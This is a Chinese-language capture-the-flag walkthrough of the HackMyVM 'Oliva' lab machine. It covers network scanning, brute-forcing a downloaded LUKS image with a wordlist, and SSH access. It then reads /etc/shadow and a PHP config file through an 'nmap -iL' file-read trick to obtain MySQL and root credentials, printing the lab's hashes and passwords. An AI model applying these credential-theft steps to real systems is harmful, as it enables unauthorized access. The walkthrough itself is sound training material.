HackMyVM-Oliva靶机WP解析

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:b1:a2:c3       (Unknown)
192.168.56.113  08:00:27:f2:63:91       (Unknown) ###this

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.841 seconds (139.05 hosts/sec). 3 responded

服务探测

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.113 
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 02:06 EDT
Nmap scan report for 192.168.56.113
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)
|_  256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)
80/tcp open  http    nginx 1.22.1 ###开放了80端口
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
MAC Address: 08:00:27:F2:63:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.56.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds

浏览器访问看一下，发现是nginx默认的安装成功界面

目录扫描

那就扫下目录

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.113 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,jpg,zip,png,html,xml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,jpg,zip,png,html,xml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php           (Status: 200) [Size: 615] #扫到index.php
Progress: 1742 / 1453508 (0.12%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1917 / 1453508 (0.13%) #后续我就不扫了
===============================================================
Finished
===============================================================

访问了一下index.php

那就直接下载他给的文件

通过scp传到kaliC:\Users\Administrator.PRIMARY>scp C:\Users\Administrator.PRIMARY\Downloads\oliva [email protected]:/home/kali/

┌──(kali㉿kali)-[~]
└─$ file oliva  
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse

LUKS 是啥不懂，直接丢给chatgpt让解释一下

LUKS（Linux Unified Key Setup）是Linux系统中的一种磁盘加密标准，用于保护存储设备（如硬盘、U盘等）上的数据安全。它提供了一种加密的方式，使得未经授权的人无法轻易访问存储在设备上的数据。

---

正好kali上有针对于LUKS的爆破工具，爆了好一会拿到密码bebita

❯ bruteforce-luks -t 4 -f /usr/share/wordlists/rockyou.txt -v 10 oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
Tried passwords: 970
Tried passwords per second: 2.878338
Last tried password: imissyou

Password found: bebita

参考文章：Linux上使用cryptsetup对磁盘、U盘等设备进行加密/解密 | SmartDeng

挂载这个加密的磁盘，拿到密码了

❯ sudo cryptsetup luksOpen oliva test
Enter passphrase for oliva:
No key available with this passphrase.
Enter passphrase for oliva:
❯ mount /dev/mapper/test /mnt
mount: /mnt: must be superuser to use mount.
       dmesg(1) may have more information after failed mount system call.
❯ sudo mount /dev/mapper/test /mnt
❯ ls -al /mnt
total 18
drwxr-xr-x  3 root root  1024 Jul  4  2023 .
drwxr-xr-x 23 root root  4096 Dec 10 19:39 ..
drwx------  2 root root 12288 Jul  4  2023 lost+found
-rw-r--r--  1 root root    16 Jul  4  2023 mypass.txt
❯ cat /mnt/mypass.txt
Yesthatsmypass!

用户提权

通过密码ssh连上，拿到user

oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm

Root提权

信息收集

传了个linpeas.sh上去看到有个mysql开放只对于本地开放

oliva@oliva:~$ ss -lntup
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*
tcp           LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               511                               [::]:80                             [::]:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*

尝试找到mysql或者mariadb的配置文件，寻找登入数据库的密码

同时发现nmap可以进行任意文件读取

尝试读取shadow文件进行用户密码爆破

oliva@oliva:~$ /usr/bin/nmap -iL /etc/shadow
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-14 17:45 CEST
Failed to resolve "root:$y$j9T$mJZXSkk0PjMpjwgunTu3a.$xlW8pdbOdxHdqCatq072mj3qQ69To4Gy6WbRwSbY6S3:19542:0:99999:7:::".
Failed to resolve "daemon:*:19542:0:99999:7:::".
Failed to resolve "bin:*:19542:0:99999:7:::".
Failed to resolve "sys:*:19542:0:99999:7:::".
Failed to resolve "sync:*:19542:0:99999:7:::".
Failed to resolve "games:*:19542:0:99999:7:::".
Failed to resolve "man:*:19542:0:99999:7:::".
Failed to resolve "lp:*:19542:0:99999:7:::".
Failed to resolve "mail:*:19542:0:99999:7:::".
Failed to resolve "news:*:19542:0:99999:7:::".
Failed to resolve "uucp:*:19542:0:99999:7:::".
Failed to resolve "proxy:*:19542:0:99999:7:::".
Failed to resolve "www-data:*:19542:0:99999:7:::".
Failed to resolve "backup:*:19542:0:99999:7:::".
Failed to resolve "list:*:19542:0:99999:7:::".
Failed to resolve "irc:*:19542:0:99999:7:::".
Failed to resolve "_apt:*:19542:0:99999:7:::".
Failed to resolve "nobody:*:19542:0:99999:7:::".
Failed to resolve "systemd-network:!*:19542::::::".
Failed to resolve "systemd-timesync:!*:19542::::::".
Failed to resolve "messagebus:!:19542::::::".
Failed to resolve "sshd:!:19542::::::".
Unable to split netmask from target expression: "oliva:$y$j9T$pud/moDgqqEeyht8CXkZE/$6EY/SqVpTsaEnPKnCxbsdCi8ImRvV86ip0LWF.8.vhD:19542:0:99999:7:::"
Failed to resolve "mysql:!:19542::::::".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.04 seconds

好吧，太久了爆不出

看了其他师傅的WP才了解到MySql的密码藏在index.php文件中，不过这个文件只有www-data用户才能读取

用nmap读取一下，得到密码Savingmypass

oliva@oliva:/var/www/html$ /usr/bin/nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-14 17:59 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds

SSH登入

mysql登上找到密码OhItwasEasy!，果然你要爆破这基本不可能很快出来

oliva@oliva:/var/www/html$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.11.3-MariaDB-1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| easy               |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,011 sec)

MariaDB [(none)]> use easy
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [easy]> show tables ;
+----------------+
| Tables_in_easy |
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)
MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,009 sec)

哈哈，果然flag文件名字改过了不可能让你这么容易通过nmap就读取到的，本来还想读ssh私钥信息，看了一下也是空的

oliva@oliva:/var/www/html$ su root
Contraseña:
root@oliva:/var/www/html# cd ~
root@oliva:~# ls -al
total 32
drwx------  4 root root 4096 jul  4  2023 .
drwxr-xr-x 18 root root 4096 jul  4  2023 ..
lrwxrwxrwx  1 root root    9 jul  4  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 jul  4  2023 .local
-rw-------  1 root root  567 jul  4  2023 .mysql_history
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root   24 jul  4  2023 rutflag.txt
drwx------  2 root root 4096 jul  4  2023 .ssh
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7